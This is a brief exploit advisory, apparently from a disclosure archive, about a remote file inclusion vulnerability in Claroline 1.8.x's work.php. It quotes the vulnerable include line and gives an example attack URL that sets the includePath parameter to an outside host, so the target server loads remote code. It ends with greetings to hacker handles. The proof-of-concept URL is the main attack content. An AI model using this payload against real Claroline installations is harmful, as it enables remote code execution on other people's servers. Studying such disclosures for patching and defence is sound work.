Claroline version 1.8.x suffers from a remote file inclusion vulnerability in work.php.
a07b3880e276ec33a684332d04d3b9228dbbb46074e3fa26daa723029de2b5bd
******************Claroline 1.8.x Remote File Inclusion Vulnerability****************
****By****: e.wiZz!
****Info****: Bosnian Idiot FTW! :D
------------cut here-------------------
In the wild....
*****Script*****: claroline.net
****Info****: Claroline is an Open Source eLearning and eWorking platform allowing teachers to build effective online courses and to manage learning and collaborative activities on the web. Translated into 35 languages, Claroline has a large worldwide users and developers community.
****Vulnerability******
../claroline/work.php
include($includePath . '/lib/form.lib.php');
****Example****
http://www.inthewild.com/claroline/work.php?includePath=http://whatever
****Greetz*****
f34r(croatian idiot :D),suN8Hclf and dark-coders,aluigi,Rishi Narang